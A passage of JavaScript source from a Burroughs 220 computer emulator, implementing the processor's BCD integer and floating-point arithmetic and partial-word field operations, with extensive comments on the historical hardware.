this.Z.set(0); } // rotate the digit into the result am += ad*0x10000000000; } // for x // Set toggles for display purposes and return the result this.A.set(am); this.D.set(this.IB.value); this.opTime = 0.145; }; /**************************************/ B220Processor.prototype.integerMultiply = function integerMultiply() { /* Algebraically multiply the multiplicand (IB) by the multiplier (A), producing a 20-digit product in A and R. Final sign of R will be final sign of A. All values are BCD with the sign in the 11th digit position. Sets Forbidden- Combination stop as necessary. 
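    As an illustrative sketch of why the result always fits: two 10-digit operands
    such as 9999999999 * 9999999999 produce at most the 20-digit product
    99999999980000000001, whose high-order ten digits land in A and low-order ten
    digits in R.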
Overflow is not possible */
    var ad;                             // current product (A) digit;
    var am = this.A.value % 0x10000000000;      // product (A) mantissa
    var aSign = ((this.A.value - am)/0x10000000000)%2;
    var count = 0;                      // count of multiply cycles
    var dm;                             // multiplicand mantissa
    var dSign;                          // sign of multiplicand
    var rc;                             // dup of rd for add counting
    var rd;                             // current multiplier (R) digit;
    var rm = am;                        // current multiplier (R) mantissa
    var sign;                           // local copy of sign toggle (sign of product)
    var x;                              // digit counter

    this.SUT.set(0);
    this.E.set(this.CADDR);
    this.readMemory();
    if (this.MET.value) {               // invalid address
        this.A.set(am);                 // sign is zero
        this.R.set(0);
        return;                         // exit to Operation Complete
    }

    dm = this.IB.value % 0x10000000000;
    dSign = ((this.IB.value - dm)/0x10000000000)%2;
    sign = aSign ^ dSign;
    am = 0;                             // clear the local product (A) mantissa

    // We now have the multiplicand in D (dm), the multiplier in R (rm), and an
    // initial product of zero in A (am). Go through a classic multiply cycle,
    // doing repeated addition based on each multiplier digit, and between digits
    // shifting the product (in am and rm) one place to the right. After 10 digits,
    // we're done. The 220 probably did a combination of addition and subtraction,
    // depending on whether the current multiplier digit was >5, to minimize the
    // number of addition cycles. We don't care how long this takes internally, so
    // the following mechanization uses the simple way.
    for (x=0; x<10; ++x) {
        rd = rm % 0x10;
        count += B220Processor.multiplyDigitCounts[rd];
        for (rc=rd; rc>0; --rc) {       // repeated addition
            am = this.bcdAdd(am, dm, 11, 0, 0);
        }

        ad = am % 0x10;
        am = (am-ad)/0x10;
        rm = (rm-rd)/0x10 + ad*0x1000000000;
    } // for x

    this.DST.set(dSign);
    this.SGT.set(sign);
    this.A.set(sign*0x10000000000 + am);
    this.R.set(sign*0x10000000000 + rm);
    this.D.set(dSign*0x10000000000 + dm);
    this.opTime = 0.090 + 0.005*count;
};

/**************************************/
B220Processor.prototype.integerDivide = function integerDivide() {
    /* Algebraically divide the dividend (A & R) by the divisor (IB), producing a
    signed 10-digit quotient in A and the remainder in R. All values are BCD
    with the sign in the 11th digit position. Sets Digit Check alarm
    as necessary. If the magnitude of the divisor (IB) is less than or equal to the
    magnitude of the dividend (A), Overflow is set and division terminates */
    var am = this.A.value % 0x10000000000;      // current remainder (A) mantissa
    var aSign = ((this.A.value - am)/0x10000000000)%2;
    var count = 0;                      // count of divide cycles
    var dm;                             // divisor mantissa
    var dSign;                          // sign of divisor
    var rd;                             // current quotient (R) digit;
    var rm = this.R.value%0x10000000000;// current quotient (R) mantissa (ignore sign)
    var rSign = (this.R.value - rm)/0x10000000000; // R register sign (restored later)
    var sign;                           // local copy of sign toggle (sign of quotient)
    var tSign = 1;                      // sign for timing count accumulation
    var x;                              // digit counter

    this.E.set(this.CADDR);
    this.readMemory();
    if (this.MET.value) {               // invalid address
        this.A.set(am);                 // sign is zero
        this.R.set(aSign*0x10000000000 + rm);
        return;                         // exit to Operation Complete
    }

    dm = this.IB.value % 0x10000000000;
    dSign = ((this.IB.value - dm)/0x10000000000)%2;
    sign = aSign ^ dSign;
    this.DST.set(dSign);
    this.SGT.set(sign);
    this.SUT.set(1);

    // We now have the divisor in D (dm) and the dividend in A (am) & R (rm).
    // The value in am will become the remainder; the value in rm will become
    // the quotient.
Go through a classic long-division cycle, repeatedly // subtracting the divisor from the dividend, counting subtractions until // underflow occurs, and shifting the divisor left one digit. // The 220 probably did not work quite the way that it has been mechanized // below, which is close to the way the 205 worked. The funny way that timing // for division could be calculated from the differences of alternate quotient // digits (see the Operational Characteristics manual, 5020A, August 1960, p.212) // suggests that something clever was going on with the 220 divide implementation. if (this.bcdAdd(dm, am, 11, 1, 1) < 0x10000000000) { this.OFT.set(1); this.A.set(aSign*0x10000000000 + am); this.R.set(rSign*0x10000000000 + rm); this.D.set(this.IB.value); this.opTime = 0.090; } else { for (x=0; x<10; ++x) { // First, shift A & R to the left one digit, with A1 shifting to ASGN rd = (rm - rm%0x1000000000)/0x1000000000; rm = (rm%0x1000000000)*0x10; am = am*0x10 + rd; // Now repeatedly subtract D from A until we would get underflow. rd = 0; while (am >= dm) { am = this.bcdAdd(dm, am, 11, 1, 1); ++rd; count += tSign; } rm += rd; // move digit into quotient tSign = -tSign; } // for x this.A.set(sign*0x10000000000 + rm); // rotate final values in A & R this.R.set(aSign*0x10000000000 + am); this.D.set(dSign*0x10000000000 + dm); this.opTime = 3.805 + 0.060*count; } }; /**************************************/ B220Processor.prototype.floatingAdd = function floatingAdd(absolute) { /* Algebraically add the floating-point addend (IB) to the floating-point augend (A), placing the result in A and clearing D. The R register is not affected. All values are BCD with the sign in the 11th digit position. The floating exponent is in the first two digit positions, biased by 50. Sets Overflow and the Digit Check alarm as necessary. For more on the use of the limiter digit in C/11 and the mechanization of floating add/subtract on the 220, see United States Patent 3,022,006, 1962-02-20 */ var ax; // augend exponent (binary) var am = this.A.value % 0x10000000000; // augend mantissa (BCD) var aSign = ((this.A.value - am)/0x10000000000)%2; var compl; // complement addition required var d; // scratch digit; var dx; // addend exponent (binary) var dm; // addend mantissa (BCD) var dSign; // addend sign var limiter = 0; // normalizing limiter var shifts = 0; // number of scaling/normalization shifts done var sign; // local copy of sign toggle var timing = 0.125; // minimum instruction timing var zeroed = false; // true if either operand normalizes to zero this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; sign = (absolute ? 0 : dSign); if (this.SUT.value) { sign = 1-sign; // complement sign for subtraction } ax = (am - am%0x100000000)/0x100000000; am %= 0x100000000; dx = (dm - dm%0x100000000)/0x100000000; dm %= 0x100000000; // If the exponents are unequal, scale the smaller // until they are in alignment, or one mantissa becomes zero. // Scale D until its exponent matches or the mantissa goes to zero. while (ax > dx) { timing += 0.010; dx = this.bcdAdd(1, dx, 2, 0, 0); // ++dx d = dm % 0x10; dm = (dm - d)/0x10; // shift D right if (dm == 0) { zeroed = true; sign = aSign; // result is value in A break; } } // Scale A until its exponent matches or the mantissa goes to zero. 
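        // (Illustrative sketch: a mantissa of 40000000 with exponent 51, aligned
        // against exponent 53, becomes 00400000 with exponent 53.)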
while (ax < dx) { timing += 0.010; ax = this.bcdAdd(1, ax, 3, 0, 0); // ++ax d = am % 0x10; am = (am - d)/0x10; // shift A right if (am == 0) { zeroed = true; am = dm; // result is value in D with adjusted sign ax = dx; dSign = 0; break; } } // Add the mantissas if (!zeroed) { compl = (aSign^sign); am = this.bcdAdd(am, dm, 11, compl, compl); // Now examine the resulting sign (still in the adder) to see if there // is a carry and we need to recomplement the result and sign. if (this.Z.value) { // Reverse the sign toggle and recomplement the result. sign = 1-sign; am = this.bcdAdd(am, 0, 11, 1, 1); timing += 0.060; } dm = dSign = 0; // Set D to its strange result value dx = 0x10; // Normalize or scale the result as necessary if (am >= 0x100000000) { // Mantissa overflow: add/subtract can produce at most one digit of // overflow, so scale by shifting right and incrementing the exponent, // checking for overflow in the exponent. if (ax < 0x99) { timing += 0.005; ax = this.bcdAdd(1, ax, 3, 0, 0); // ++ax d = am % 0x10; am = (am - d)/0x10; // shift A right } else { // A scaling shift would overflow the exponent, so set the overflow // toggle and leave the mantissa as it was from the add, without the // exponent inserted back into it. Since the A register gets reassembled // below, we need to set up the mantissa and exponent so the reconstruct // will effectively do nothing. this.OFT.set(1); sign = ax = dx = 0; } } else if (am == 0) { // mantissa is zero => result is zero ax = sign = 0; timing += 0.065; } else { // normalize the result as necessary while (am < 0x10000000) { if (ax > 0 && shifts < 8) { ++shifts; timing += 0.010; ax = this.bcdAdd(1, ax, 3, 1, 1); // --ax am *= 0x10; // shift left } else { // Exponent underflow: set the reconstructed A to zero. am = ax = sign = 0; break; } } // Determine whether normalizing shifts exceed the limiter value limiter = (this.CCONTROL - this.CCONTROL%0x1000)/0x1000; if (limiter > 0) { if (limiter >= 8) { limiter = 0; } else if (shifts > limiter) { limiter = 10 - (shifts-limiter); this.SST.set(1); // limiter exceeded: set Single-Step } else { limiter = 0; } } } } // Rebuild the C register with the final normalization limiter this.CCONTROL = this.CCONTROL%0x1000 + limiter*0x1000; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); // Set toggles for display purposes and set the result. this.AX.set(ax); this.DX.set(dx); this.DST.set(dSign); this.SGT.set(sign); this.A.set((sign*0x100 + ax)*0x100000000 + am); this.D.set((dSign*0x100 + dx)*0x100000000 + dm); this.opTime = timing; }; /**************************************/ B220Processor.prototype.floatingAdd__WITH_ROUND = function floatingAdd(absolute) { /* Algebraically add the floating-point addend (IB) to the floating-point augend (A), placing the result in A and clearing D. The R register is not affected. All values are BCD with the sign in the 11th digit position. The floating exponent is in the first two digit positions, biased by 50. Sets Overflow and the Digit Check alarm as necessary. 
For more on the use of the limiter digit in C/11 and the mechanization of floating add/subtract on the 220, see United States Patent 3,022,006, 1962-02-20 */ /* THIS IS AN EXPERIMENTAL VERSION THAT ROUNDS RESULTS */ var ax; // augend exponent (binary) var am = this.A.value % 0x10000000000; // augend mantissa (BCD) var aSign = ((this.A.value - am)/0x10000000000)%2; var compl; // complement addition required var d; // scratch digit; var dx; // addend exponent (binary) var dm; // addend mantissa (BCD) var dSign; // addend sign var limiter = (this.CCONTROL - this.CCONTROL%0x1000)/0x1000; // normalizing limiter var shifts = 0; // number of scaling/normalization shifts done var sign; // local copy of sign toggle var timing = 0.125; // minimum instruction timing this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; sign = (absolute ? 0 : dSign); if (this.SUT.value) { sign = 1-sign; // complement sign for subtraction } ax = (am - am%0x100000000)/0x100000000; am %= 0x100000000; dx = (dm - dm%0x100000000)/0x100000000; dm %= 0x100000000; am *= 0x100; // insert two low-order rounding digits dm *= 0x100; // If the exponents are unequal, scale the smaller // until they are in alignment, or one mantissa becomes zero. // Scale D until its exponent matches or the mantissa goes to zero. while (ax > dx) { if (++shifts < 8) { timing += 0.010; dx = this.bcdAdd(1, dx, 2, 0, 0); // ++dx d = dm % 0x10; dm = (dm - d)/0x10; // shift right } else { sign = aSign; // result is value in A limiter = 0; break; } } // Scale A until its exponent matches or the mantissa goes to zero. while (ax < dx) { if (++shifts < 8) { timing += 0.010; ax = this.bcdAdd(1, ax, 3, 0, 0); // ++ax d = am % 0x10; am = (am - d)/0x10; // shift right } else { am = dm; // result is value in D with adjusted sign ax = dx; limiter = 0; break; } } // Add the mantissas if (shifts < 8) { compl = (aSign^sign); am = this.bcdAdd(am, dm, 13, compl, compl); // Now examine the resulting sign (still in the adder) to see if there // is a carry and we need to recomplement the result and sign. if (this.Z.value) { // Reverse the sign toggle and recomplement the result. sign = 1-sign; am = this.bcdAdd(am, 0, 13, 1, 1); timing += 0.060; } } dm = dSign = 0; // Set D to its strange result value dx = 0x10; // Normalize or scale the result as necessary if (am >= 0x10000000000) { // Mantissa overflow: add/subtract can produce at most one digit of // overflow, so scale by shifting right and incrementing the exponent, // checking for overflow in the exponent. limiter = 0; if (ax < 0x99) { timing += 0.005; ax = this.bcdAdd(1, ax, 3, 0, 0); // ++ax d = am % 0x10; am = (am - d)/0x10; // shift right } else { // A scaling shift would overflow the exponent, so set the overflow // toggle and leave the mantissa as it was from the add, without the // exponent inserted back into it. Since the A register gets reassembled // below, we need to set up the mantissa and exponent so the reconstruct // will effectively do nothing. 
this.OFT.set(1); sign = ax = dx = limiter = 0; } } else if (am == 0) { // mantissa is zero ax = sign = limiter = 0; timing += 0.065; } else { // normalize the result as necessary shifts = 0; while (am < 0x1000000000) { // NOTE: THIS INCLUDES THE ROUNDING DIGITS if (ax > 0) { ++shifts; timing += 0.010; ax = this.bcdAdd(1, ax, 3, 1, 1); // --ax am *= 0x10; // shift left } else { // Exponent underflow: set the reconstructed A to zero. am = ax = sign = 0; break; } } // Determine whether normalizing shifts exceed the limiter value if (limiter > 0) { if (limiter >= 8) { limiter = 0; } else if (shifts > limiter) { limiter = 10 - (shifts-limiter); this.SST.set(1); // limiter exceeded: set Single-Step } else { limiter = 0; } } } // Rebuild the C register with the final normalization limiter this.CCONTROL = this.CCONTROL%0x1000 + limiter*0x1000; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); // Set toggles for display purposes and set the result. d = am%0x100; // get the rounding digits am = (am - d)/0x100; // scale back to 8 digits if (d >= 0x50) { // round required am = this.bcdAdd(1, am, 11, 0, 0); if (am >= 0x100000000) { ax = this.bcdAdd(1, ax, 3, 0, 0); // ignore exponent overflow, for now d = am%0x10; am = (am - d)/0x10; if (d >= 5) { // round again after scale right am = this.bcdAdd(1, am, 11, 0, 0); } } } this.AX.set(ax); this.DX.set(dx); this.DST.set(dSign); this.SGT.set(sign); this.A.set((sign*0x100 + ax)*0x100000000 + am); this.D.set((dSign*0x100 + dx)*0x100000000 + dm); this.opTime = timing; }; /**************************************/ B220Processor.prototype.floatingMultiply = function floatingMultiply() { /* Algebraically multiply the floating-point multiplicand in the IB register by the floating-point multiplier in the A register, producing a 18-digit product (16 mantissa + 2 exponent) in A and R. All values are BCD with the sign in the 11th digit position. The floating exponent is in the first two digit positions, biased by 50. 
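    As an illustrative sketch of the exponent arithmetic: the stored exponents add
    and the bias of 50 is then removed once, so operands with stored exponents 52
    and 53 give a result exponent of 55 before any normalization adjustment.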
Sets the Digit Check alarm as necessary */ var ad; // current product (A) digit; var ax; // product/multiplier (A) exponent var am = this.A.value % 0x10000000000; // product (A) mantissa var aSign = ((this.A.value - am)/0x10000000000)%2; var count = 0; // count of word-times consumed var dx; // multiplicand exponent var dm; // multiplicand mantissa var dSign; // multiplicand sign var rc; // dup of rd for add counting var rd; // current multipler (R) digit; var rm = 0; // current multiplier (R) mantissa var sign; // local copy of sign toggle (sign of product) var timing = 0.085; // minimum instruction timing var x; // digit counter this.SUT.set(0); this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; ax = (am - am%0x100000000)/0x100000000; am %= 0x100000000; dx = (dm - dm%0x100000000)/0x100000000; dm %= 0x100000000; if (am < 0x10000000) { // A is not normalized, so assume zero this.A.set(0); this.R.set(0); } else if (dm < 0x10000000) { // D is not normalized, so assume zero this.A.set(0); this.R.set(0); } else { sign = (aSign ^ dSign); rm = am; // shift A:08 to R:98, then shift R again right 1 am = 0; // result of shifting A to R dm *= 0x100; // circulate D two places left (D:22 is 0, so a simple shift left will do) x = this.bcdAdd(ax, dx, 3); // do exponent arithmetic into temp x ax = this.bcdAdd(0x50, x, 3, 1, 1);// subtract the exponent bias from the A exponent timing += 0.080; if (x >= 0x150) { // exponent overflow this.OFT.set(1); this.A.set(am); this.R.set(rm); } else if (x < 0x50) { // exponent underflow this.A.set(0); this.R.set(0); dm %= 0x100000000; } else { // We now have the multiplicand in D (dm), the multiplier in R (rm), and an // initial product of zero in A (am). Go through a classic multiply cycle, // doing repeated addition based on each multipler digit, and between digits // shifting the product (in am and rm) one place to the right. After 8 digits, // we're done, except for normalization. for (x=0; x<8; ++x) { rd = rm % 0x10; count += B220Processor.multiplyDigitCounts[rd]; for (rc=rd; rc>0; --rc) { am = this.bcdAdd(am, dm, 11, 0, 0); } // while rd ad = am % 0x10; am = (am-ad)/0x10; rm = (rm-rd)/0x10 + ad*0x1000000000; } // for x // Normalize the result as necessary. if (am >= 0x1000000000) { // Shift product two places right timing += 0.020; ad = am % 0x100; am = (am-ad)/0x100; rd = rm % 0x100; rm = (rm-rd)/0x100 + ad*0x100000000; } else if (ax > 0) { // Shift product one place right timing += 0.010; ad = am % 0x10; am = (am-ad)/0x10; rd = rm % 0x10; rm = (rm-rd)/0x10 + ad*0x1000000000; ax = this.bcdAdd(0x01, ax, 3, 1, 1); // decrement exponent } else { // Exponent underflow: set R and the reconstructed A to zero. 
am = ax = rm = sign = 0; } // Reconstruct the final product in the registers this.A.set((sign*0x100 + ax)*0x100000000 + am); this.R.set(sign*0x10000000000 + rm); timing += 0.005*count; } // Set the registers and toggles for display this.SGT.set(sign); this.DST.set(dSign); this.AX.set(ax); this.DX.set(dx); this.D.set(dm); } this.opTime = timing; }; /**************************************/ B220Processor.prototype.floatingDivide = function floatingDivide() { /* Algebraically divide the 18-digit (16 mantissa + 2 exponent) floating- point dividend in the A & R registers by the floating-point divisor in the D register, producing a 9- or 10-digit quotient in the A & R registers and a 6- or 7-digit remainder in the low-order digits of the R register. All values are BCD with the sign in the 11th digit position. The floating exponent is in the first two digit positions, biased by 50. Sets the Digit Check alarm as necessary */ var ad = 0; // current remainder (A) digit var ax = 0; // dividend/quotient exponent var am = this.A.value % 0x10000000000; // current remainder (A) mantissa var aSign = ((this.A.value - am)/0x10000000000)%2; var count = 0; // count of word-times consumed var dx = 0; // divisor exponent var dm = 0; // divisor mantissa var dSign = 0; // divisor sign var rd = 0; // current quotient (R) digit; var rm = this.R.value%0x10000000000;// current quotient (R) mantissa (drop sign) var rSign = (this.R.value-rm)/0x10000000000; // R register sign (restore later) var sign = 0; // local copy of sign toggle (sign of quotient) var timing = 0.085; // minimum instruction timing var tSign = 1; // sign for timing count accumulation var x = 0; // digit counter this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; sign = aSign ^ dSign; this.SUT.set(1); ax = (am - am%0x100000000)/0x100000000; am %= 0x100000000; dx = (dm - dm%0x100000000)/0x100000000; dm %= 0x100000000; if (am < 0x10000000 && dm >= 0x10000000) { this.A.set(0); // A is not normalized but D is, quotient=0 this.R.set(0); } else if (dm < 0x10000000) { this.OFT.set(1); // D is not normalized, overflow (div 0) this.A.set(ax*0x100000000 + am); } else { // Add the exponent bias to the dividend exponent and check for underflow ax = this.bcdAdd(ax, 0x50, 3); timing += 0.085; if (ax < dx) { // Exponents differ by more than 50 -- underflow sign = 0; ax = this.bcdAdd(dx, ax, 3, 1, 1); this.A.set(0); this.R.set(0); } else { // Subtract the exponents and check for overflow ax = this.bcdAdd(dx, ax, 3, 1, 1); if (ax > 0x99) { this.OFT.set(1); sign = 0; this.A.set(am); } else { // Shift A+R 1 digit right (exponent adjustment occurs later ad = am%0x10; am = (am-ad)/0x10; rd = rm%0x10; rm = (rm-rd)/0x10 + ad*0x1000000000; // We now have the divisor in D (dm) and the dividend in A (am) & R (rm). // The value in am will become the remainder; the value in rm will become // the quotient. Go through a classic long-division cycle, repeatedly // subtracting the divisor from the dividend, counting subtractions until // underflow occurs, and shifting the divisor left one digit. // The 220 probably did not work quite the way that it has been mechanized // below, but we don't have sufficient technical details to know for sure. // The following is adapted from the 205 implementation. for (x=0; x<11; ++x) { // Repeatedly subtract D from A until we would get underflow. 
ad = 0; /********** DEBUG ********** console.log("FDV %2d Ax=%3s A=%11s R=%11s Dx=%2s D=%11s", x, (ax+0x1000).toString(16).substring(1), (am+0x100000000000).toString(16).substring(1), (rm+0x100000000000).toString(16).substring(1), (dx+0x1000).toString(16).substring(1), (dm+0x100000000000).toString(16).substring(1)); ***************************/ while (am >= dm) { am = this.bcdAdd(dm, am, 11, 1, 1); ++ad; count += tSign; } // Shift A & R to the left one digit, accumulating the quotient digit in R rd = (rm - rm%0x1000000000)/0x1000000000; rm = (rm%0x1000000000)*0x10 + ad; // Shift into remainder except on last digit. if (x < 10) { am = am*0x10 + rd; } tSign = -tSign; } // for x /********** DEBUG ********** console.log("FDV %2d Ax=%3s A=%11s R=%11s Dx=%2s D=%11s", x, (ax+0x1000).toString(16).substring(1), (am+0x100000000000).toString(16).substring(1), (rm+0x100000000000).toString(16).substring(1), (dx+0x1000).toString(16).substring(1), (dm+0x100000000000).toString(16).substring(1)); ***************************/ // Rotate the quotient and remainder for 10 digits to exchange registers for (x=0; x<10; ++x) { ad = am%0x10; rd = rm%0x10; rm = (rm - rd)/0x10 + ad*0x1000000000; am = (am - ad)/0x10 + rd*0x1000000000; } /********** DEBUG ********** console.log("FDV %2d Ax=%3s A=%11s R=%11s Dx=%2s D=%11s", 98, (ax+0x1000).toString(16).substring(1), (am+0x100000000000).toString(16).substring(1), (rm+0x100000000000).toString(16).substring(1), (dx+0x1000).toString(16).substring(1), (dm+0x100000000000).toString(16).substring(1)); ***************************/ if (am >=0x1000000000 && ax == 0x99) { this.OFT.set(1); this.A.set(am); this.R.set(rSign*0x10000000000 + rm); } else { if (am < 0x1000000000) { // Normalize one digit to the right ad = am%0x10; am = (am - ad)/0x10; rm = (rm - rm%0x10)/0x10 + ad*0x1000000000; } else { // Normalize two digits to the right and adjust exponent ad = am%0x100; am = (am - ad)/0x100; rm = (rm - rm%0x100)/0x100 + ad*0x100000000; ax = this.bcdAdd(ax, 1, 3); } /********** DEBUG ********** console.log("FDV %2d Ax=%3s A=%11s R=%11s Dx=%2s D=%11s", 99, (ax+0x1000).toString(16).substring(1), (am+0x100000000000).toString(16).substring(1), (rm+0x100000000000).toString(16).substring(1), (dx+0x1000).toString(16).substring(1), (dm+0x100000000000).toString(16).substring(1)); ***************************/ // Reconstruct the final product in the registers this.A.set((sign*0x100 + ax)*0x100000000 + am); this.R.set(rSign*0x10000000000 + rm); } timing += 4.075 + 0.060*count; } } // Set the registers and toggles for display this.AX.set(ax); this.DX.set(dx); this.D.set(dm); } this.SGT.set(sign); this.DST.set(dSign); this.opTime = timing; }; /*********************************************************************** * Partial-Word Operations * ***********************************************************************/ /**************************************/ B220Processor.prototype.compareField = function compareField() { /* Implements CFA/CFR (18). Compares the value in either the A or R register to a word in memory, either whole word or a designated partial field, by subtracting the respective memory digits from the register digits. Sets the comparison indicators (UET, HIT) to indicate whether the register field is LOW (UET=1, HIT=0), EQUAL (UET=0, HIT=1), or HIGH (UET=1, HIT=1) with respect to the memory field. Note that the sign digit, if included in the comparison is handled in a very strange fashion -- see the discussion in the 220 Operational Characteristics manual for the truly gruesome details. 
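    As an illustrative sketch of the normal case: comparing an A register holding
    +0000000005 against a memory word of +0000000007 ends LOW (UET=1, HIT=0),
    since the register field is smaller than the memory field.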
And no, I didn't get this right the first time, nor the second, nor the third */ var adder = 0; // current adder digit var carry = 1; // carry flag defaults to 1, since we're subtracting var compl = 1; // do complement addition by default, since we're subtracting var dd; // current memory (D-register) digit var dSign = 0; // memory (D-register) sign var dw; // memory (D-register) word var high = 1; // initialize compare toggles to EQUAL var L; // partial-word length var rSign; // register sign digit var rd; // current register digit var rw; // register word value var s; // partial-word "s" digit var sign = 1; // default sign is negative, since we're subtracting var unequal = 0; // initialize compare toggles to EQUAL this.opTime = 0.150; this.E.set(this.CADDR); this.UET.set(0); this.HIT.set(0); this.readMemory(); if (!this.MET.value) { this.SUT.set(1); dw = this.IB.value; this.D.set(dw); if (this.CCONTROL%0x10 == 1) { rw = this.R.value; // CFR: Compare Field R } else { rw = this.A.value; // CFA: Compare Field A } // Determine field lengths for partial- or whole-word comparison. if (!(this.CCONTROL & 0x10)) { // whole word s = 10; L = 11; } else { // partial word s = this.CCONTROL >>> 12; if (s == 0) { s = 10; } L = (this.CCONTROL >>> 8)%0x10; if (L == 0) { L = 10; } } // If the sign digit is included in the comparison, set up for algebraic // comparison and the strange sign ordering. This is tricky. Basically, // the non-signed digits need to be compared in a signed, algebraic manner, // but the transformed sign digits need to be compared unsigned. Since the // compare is based on a signed subtraction, then if the original sign of // either of the operands indicates negative (1, 2, 3), we use the 9s- // complement of the transformed sign digit for that operand, converting // the unsigned compare of the transformed sign digits into a signed one. if (L > s) { // sign digit is included rSign = (rw - rw%0x10000000000)/0x10000000000; if (rSign < 8) { rSign ^= 3; } dSign = (dw - dw%0x10000000000)/0x10000000000; if (dSign < 8) { dSign ^= 3; } if (dSign > 2) { sign = 1; } else { // treat as negative sign = 0; dSign = 9-dSign; } if (rSign > 2) { compl = sign; } else { // treat as negative compl = 1-sign; rSign = 9-rSign; } carry = compl; rw = rw%0x10000000000 + rSign*0x10000000000; dw = dw%0x10000000000 + dSign*0x10000000000; } // Now go through a modified add cycle, subtracting the digit pairs using // 10s-complement addition, and marking the result unequal if any digits differ. this.DC.set(0x09); // set up to rotate through 11 digits do { rd = rw%0x10; dd = dw%0x10; if (s < 10) { // positition to the "s" digit ++s; } else if (L > 0) { // compare digits in the sL field --L; this.X.set(rd); // for display only this.Y.set(dd); adder = (compl ? 9-rd : rd) + dd + carry; if (adder < 10) { // decimal correct the adder carry = 0; } else { carry = 1; adder -= 10; } this.Z.set(adder); // for display only if (adder) { // if the adder is not zero, unequal = 1; // result will be unequal, determined by sign } } else { // Ignore any digits after L is exhausted this.DC.set(0x19); // (the 220 didn't quit early like this, though) } // Shift both words right (no need to rotate them) rw = (rw-rd)/0x10; dw = (dw-dd)/0x10; this.DC.inc(); } while (this.DC.value < 0x20) // If there is a final carry, we keep the original sign; if we are not complementing, // force an unequal result. If there is no final carry, we complement the result sign. 
if (carry) { if (!compl) { unequal = 1; } } else { sign = 1-sign; } // Set the console lamps and toggles to the result. if (unequal) { // result is unequal, sign determines low/high high = 1-sign; // negative=low, positive=high this.compareEqualLamp.set(0); this.compareLowLamp.set(1-high); this.compareHighLamp.set(high); } else { this.compareEqualLamp.set(1); this.compareLowLamp.set(0); this.compareHighLamp.set(0); } this.DST.set(dSign%2); this.SGT.set(sign); this.HIT.set(high); this.UET.set(unequal); this.CCONTROL = ((s%10)*0x10 + L)*0x100 + this.CCONTROL%0x100; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); if (L > 0) { this.setProgramCheck(1); } } }; /**************************************/ B220Processor.prototype.increaseFieldLocation = function increaseFieldLocation() { /* Implements IFL (26). Increments a designated partial field in a memory word by the two-digit value in (42) of the C register */ var adder = 0; // current adder digit var carry = 0; // carry flag defaults to 0, since we're adding var dd; // current memory (D-register) digit var dw; // memory (D-register) word var L; // partial-word length var rd; // current increase digit var rw; // increase value var s; // partial-word "s" digit this.opTime = 0.160; this.SUT.set(0); this.DST.set(0); this.SGT.set(0); this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { dw = this.IB.value; this.D.set(dw); rw = this.CCONTROL%0x100; // increase value s = this.CCONTROL >>> 12; if (s == 0) { s = 10; } L = (this.CCONTROL >>> 8)%0x10; if (L == 0) { L = 10; } // Now go through a modified add cycle for each digit. this.DC.set(0x09); // set up to rotate 11 digits while (this.DC.value < 0x20) { dd = dw%0x10; // get digit from memory value if (s < 10) { // positition to the "s" digit ++s; adder = dd; // just copy the digit } else if (L > 0) { // operate on the partial-word field --L; rd = rw%0x10; // get digit from increase value this.X.set(rd); // for display only this.Y.set(dd); adder = rd + dd + carry; if (adder < 10) { // decimal correct the adder carry = 0; } else { carry = 1; adder -= 10; } this.Z.set(adder); // for display only rw = (rw-rd)/0x10; // shift the increase value right } else { adder = dd; // copy any remaining digits after L is exhausted } dw = (dw-dd)/0x10 + adder*0x10000000000; // rotate result into memory value this.DC.inc(); } // while DC < 20 this.D.set(dw); this.IB.set(dw); this.C10.set(carry); // set carry toggle if (carry) { this.OFT.set(1); // set overflow if there's a carry } this.CCONTROL = ((s%10)*0x10 + L)*0x100 + this.CCONTROL%0x100; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); if (L > 0) { // check whether L was decremented to zero this.setProgramCheck(1); } else { this.writeMemory(); } } }; /**************************************/ B220Processor.prototype.decreaseFieldLocation = function decreaseFieldLocation(loadB) { /* Implements DFL/DLB (27, 28). 
Decrements a designated partial field in a memory word by the two-digit value in (42) of the C register */ var adder = 0; // current adder digit var carry = 1; // carry flag defaults to 1, since we're subtracting var dd; // current memory (D-register) digit var dw; // memory (D-register) word var L; // partial-word length var rd; // current decrease digit var rw; // decrease value var s; // partial-word "s" digit this.opTime = 0.160; this.SUT.set(1); this.DST.set(1); this.SGT.set(0); this.RPT.set(0); if (loadB) { this.B.set(0); } this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { dw = this.IB.value; this.D.set(dw); rw = this.CCONTROL%0x100; // decrease value s = this.CCONTROL >>> 12; if (s == 0) { s = 10; } L = (this.CCONTROL >>> 8)%0x10; if (L == 0) { L = 10; } // Now go through a modified add cycle for each digit. this.DC.set(0x09); // set up to rotate 11 digits while (this.DC.value < 0x20) { dd = dw%0x10; // get digit from memory value if (s < 10) { // positition to the "s" digit ++s; adder = dd; // just copy the digit } else if (L > 0) { // operate on the partial-word field --L; rd = rw%0x10; // get digit from decrease value this.X.set(rd); // for display only this.Y.set(dd); adder = 9 - rd + dd + carry; if (adder < 10) { // decimal correct the adder carry = 0; } else { carry = 1; adder -= 10; } this.Z.set(adder); // for display only rw = (rw-rd)/0x10; // shift the decrease value right if (loadB) { // shift adder digit into B if op=DLB this.B.value = (this.B.value - this.B.value%0x10)/0x10 + adder*0x1000; } } else { adder = dd; // copy any remaining digits after L is exhausted } dw = (dw-dd)/0x10 + adder*0x10000000000; // rotate result into memory value this.DC.inc(); } // while DC < 20 this.D.set(dw); this.IB.set(dw); this.C10.set(carry); // set carry toggle if (carry) { this.RPT.set(1); // set repeat toggle if no underflow } if 